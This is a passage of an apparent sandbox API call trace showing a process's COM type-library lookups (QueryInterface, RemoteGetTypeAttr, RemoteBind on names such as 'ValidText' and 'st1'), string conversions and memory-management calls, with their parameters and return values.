pBstrHelpFile=0x6bd3160*="") returned 0x0 [0042.043] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x182ea0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0042.043] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0042.044] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182fa8 | out: ppvObject=0x182fa8*=0x0) returned 0x80004002 [0042.044] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182fa0 | out: ppvObject=0x182fa0*=0x0) returned 0x80004002 [0042.044] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.044] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1831f8, pDummy=0x5e61250 | out: ppTypeAttr=0x1831f8, pDummy=0x5e61250*=0x0) returned 0x0 [0042.044] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.044] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.044] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.044] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.044] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182790, pDummy=0x0 | out: ppTypeAttr=0x182790, pDummy=0x0) returned 0x0 [0042.044] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.044] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.044] IUnknown:Release (This=0x6a6e948) returned 0x8 [0042.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2cde, cbMultiByte=10, lpWideCharStr=0x182ff0, cchWideChar=11 | out: lpWideCharStr="ValidText") returned 10 [0042.044] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="ValidText", lHashVal=0x10229c, wFlags=0x5, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x0, pDescKind=0x182fbc*=0, ppFuncDesc=0x182fc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x80028ca0 [0042.044] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.044] IUnknown:Release (This=0x6a6e948) returned 0x8 [0042.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2cde, cbMultiByte=10, lpWideCharStr=0x182cf0, cchWideChar=11 | out: lpWideCharStr="ValidText") returned 10 [0042.044] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="ValidText", lHashVal=0x10229c, wFlags=0x3, ppTInfo=0x182ca8, pDescKind=0x182cbc, ppFuncDesc=0x182cc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ca8*=0x6a6e8e8, pDescKind=0x182cbc*=1, ppFuncDesc=0x182cc0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.044] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182cb0, pDummy=0x1 | out: ppTypeAttr=0x182cb0, pDummy=0x1) returned 0x0 [0042.044] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.044] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e8e8, hreftype=0x25, ppTInfo=0x182568 | out: ppTInfo=0x182568*=0x6ceee08) returned 0x0 [0042.044] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182738 | out: ppvObject=0x182738*=0x0) returned 0x80004002 [0042.044] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1825b8, pDummy=0x10 | out: ppTypeAttr=0x1825b8, pDummy=0x10) returned 0x0 [0042.044] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0042.045] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.045] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182a60, pDummy=0x0 | out: ppTypeAttr=0x182a60, pDummy=0x0) returned 0x0 [0042.045] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.045] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x182b10 | out: ppvObject=0x182b10*=0x6a6e8e8) returned 0x0 [0042.045] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6a6e8e8, memid=2005, invkind=2, pFuncIndex=0x182b50 | out: pFuncIndex=0x182b50*=0x3) returned 0x0 [0042.045] ITypeInfo2:GetFuncCustData (in: This=0x6a6e8e8, index=0x3, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x182b68 | out: pVarVal=0x182b68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x182c10, varVal2=0x6b7ed20)) returned 0x0 [0042.045] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.045] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182ac8 | out: ppvObject=0x182ac8*=0x0) returned 0x80004002 [0042.045] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1829a0 | out: ppvObject=0x1829a0*=0x0) returned 0x80004002 [0042.045] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.045] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182ac8 | out: ppvObject=0x182ac8*=0x0) returned 0x80004002 [0042.045] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1829a0 | out: ppvObject=0x1829a0*=0x0) returned 0x80004002 [0042.045] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.045] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.045] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e8e8) returned 0x0 [0042.045] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.045] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e28 | out: ppvObject=0x182e28*=0x0) returned 0x80004002 [0042.045] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.045] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.045] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f88 | out: ppvObject=0x182f88*=0x0) returned 0x80004002 [0042.045] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f80 | out: ppvObject=0x182f80*=0x0) returned 0x80004002 [0042.045] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x183408, pDummy=0x0 | out: ppTypeAttr=0x183408, pDummy=0x0) returned 0x0 [0042.045] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.045] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.045] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.045] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.045] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1829a0, pDummy=0x0 | out: ppTypeAttr=0x1829a0, pDummy=0x0) returned 0x0 [0042.045] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.046] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.046] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.046] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f18 | out: ppvObject=0x182f18*=0x0) returned 0x80004002 [0042.046] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.046] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182f10, pDummy=0x10 | out: ppTypeAttr=0x182f10, pDummy=0x10) returned 0x0 [0042.046] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.046] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x182f08 | out: pRefType=0x182f08*=0x1302) returned 0x0 [0042.046] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x182f20 | out: ppTInfo=0x182f20*=0x6ceef68) returned 0x0 [0042.046] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.046] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x182f10, pDummy=0x182ef0 | out: ppTypeAttr=0x182f10, pDummy=0x182ef0*=0x182f30) returned 0x0 [0042.046] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.046] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x182f08 | out: pRefType=0x182f08*=0xf) returned 0x0 [0042.046] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x182f20 | out: ppTInfo=0x182f20*=0x6bbd1c8) returned 0x0 [0042.046] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.046] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x182f10, pDummy=0x182ee8 | out: ppTypeAttr=0x182f10, pDummy=0x182ee8*=0xf) returned 0x0 [0042.046] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.046] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.046] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x182f90, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6bd3160 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6bd3160*="") returned 0x0 [0042.046] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x182ea0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0042.046] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0042.047] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182fa8 | out: ppvObject=0x182fa8*=0x0) returned 0x80004002 [0042.047] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182fa0 | out: ppvObject=0x182fa0*=0x0) returned 0x80004002 [0042.047] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.047] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1831f8, pDummy=0x5e62096 | out: ppTypeAttr=0x1831f8, pDummy=0x5e62096*=0x0) returned 0x0 [0042.047] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.047] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.047] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.047] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.047] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182790, pDummy=0x0 | out: ppTypeAttr=0x182790, pDummy=0x0) returned 0x0 [0042.047] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.047] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.047] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.047] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182f80, pDummy=0x0 | out: ppTypeAttr=0x182f80, pDummy=0x0) returned 0x0 [0042.047] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.047] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1835f0 | out: ppvObject=0x1835f0*=0x0) returned 0x80004002 [0042.047] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1835f8 | out: ppvObject=0x1835f8*=0x0) returned 0x80004002 [0042.047] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1835e8 | out: ppvObject=0x1835e8*=0x6ceee08) returned 0x0 [0042.047] ITypeInfo2:GetTypeKind (in: This=0x6ceee08, pTypeKind=0x183644 | out: pTypeKind=0x183644*=5) returned 0x0 [0042.047] IUnknown:Release (This=0x6ceee08) returned 0x5 [0042.047] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1835f8 | out: ppvObject=0x1835f8*=0x0) returned 0x80004002 [0042.048] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.048] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1835f0, pDummy=0x10 | out: ppTypeAttr=0x1835f0, pDummy=0x10) returned 0x0 [0042.048] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.048] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x1835e8 | out: pRefType=0x1835e8*=0x1302) returned 0x0 [0042.048] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x183600 | out: ppTInfo=0x183600*=0x6ceef68) returned 0x0 [0042.048] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.048] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x1835f0, pDummy=0x1835d0 | out: ppTypeAttr=0x1835f0, pDummy=0x1835d0*=0x183610) returned 0x0 [0042.048] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.048] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x1835e8 | out: pRefType=0x1835e8*=0xf) returned 0x0 [0042.048] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x183600 | out: ppTInfo=0x183600*=0x6bbd1c8) returned 0x0 [0042.048] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.048] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x1835f0, pDummy=0x1835c8 | out: ppTypeAttr=0x1835f0, pDummy=0x1835c8*=0xf) returned 0x0 [0042.048] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.048] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.048] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.048] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.048] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.048] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.048] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182de0, pDummy=0x0 | out: ppTypeAttr=0x182de0, pDummy=0x0) returned 0x0 [0042.048] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.048] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.048] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.048] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x183020, pDummy=0x0 | out: ppTypeAttr=0x183020, pDummy=0x0) returned 0x0 [0042.048] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.048] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.048] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.048] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182de0, pDummy=0x0 | out: ppTypeAttr=0x182de0, pDummy=0x0) returned 0x0 [0042.048] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.048] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.048] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.048] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x183020, pDummy=0x0 | out: ppTypeAttr=0x183020, pDummy=0x0) returned 0x0 [0042.048] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.048] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x16c) returned 0x6c97d30 [0042.049] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfcd0) [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.049] GetCurrentProcess () returned 0xffffffffffffffff [0042.049] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.049] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.049] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1846e8 | out: ppvObject=0x1846e8*=0x0) returned 0x80004002 [0042.049] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1846e0 | out: ppvObject=0x1846e0*=0x0) returned 0x80004002 [0042.049] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.049] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.049] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1846e8 | out: ppvObject=0x1846e8*=0x0) returned 0x80004002 [0042.049] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1846e0 | out: ppvObject=0x1846e0*=0x0) returned 0x80004002 [0042.049] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.049] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.049] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1846e8 | out: ppvObject=0x1846e8*=0x0) returned 0x80004002 [0042.049] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1846e0 | out: ppvObject=0x1846e0*=0x0) returned 0x80004002 [0042.049] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.049] IMalloc:Realloc (This=0x7feffc15380, pv=0x3e42280, cb=0x800) returned 0x66ec4d0 [0042.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050196, cbMultiByte=4, lpWideCharStr=0x182ff0, cchWideChar=5 | out: lpWideCharStr="st1") returned 4 [0042.049] ITypeComp:RemoteBind (in: This=0x6990970, szName="st1", lHashVal=0x10d576, wFlags=0x5, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x0, pDescKind=0x182fbc*=0, ppFuncDesc=0x182fc0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050196, cbMultiByte=4, lpWideCharStr=0x182ff0, cchWideChar=5 | out: lpWideCharStr="st1") returned 4 [0042.050] ITypeComp:RemoteBind (in: This=0x6992860, szName="st1", lHashVal=0x10d576, wFlags=0x5, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x0, pDescKind=0x182fbc*=0, ppFuncDesc=0x182fc0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050196, cbMultiByte=4, lpWideCharStr=0x182ff0, cchWideChar=5 | out: lpWideCharStr="st1") returned 4 [0042.050] ITypeComp:RemoteBind (in: This=0x6992e00, szName="st1", lHashVal=0x10d576, wFlags=0x5, ppTInfo=0x182fa8, pDescKind=0x182fbc, ppFuncDesc=0x182fc0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182fa8*=0x0, pDescKind=0x182fbc*=0, ppFuncDesc=0x182fc0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="st1") returned 0x10d576 [0042.050] strcpy_s (in: _Dst=0x182f50, _DstSize=0x4, _Src="st1" | out: _Dst="st1") returned 0x0 [0042.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182f50, cbMultiByte=4, lpWideCharStr=0x182da0, cchWideChar=4 | out: lpWideCharStr="st1") returned 4 [0042.050] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.050] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="st1", lHashVal=0x10d576, pfName=0x182e70, pBstrLibName=0x182da0 | out: pfName=0x182e70*=0, pBstrLibName=0x182da0) returned 0x0 [0042.050] IUnknown:Release (This=0x6990960) returned 0x7 [0042.050] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.050] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="st1", lHashVal=0x10d576, pfName=0x182e70, pBstrLibName=0x182da0 | out: pfName=0x182e70*=0, pBstrLibName=0x182da0) returned 0x0 [0042.050] IUnknown:Release (This=0x6992850) returned 0x11 [0042.050] 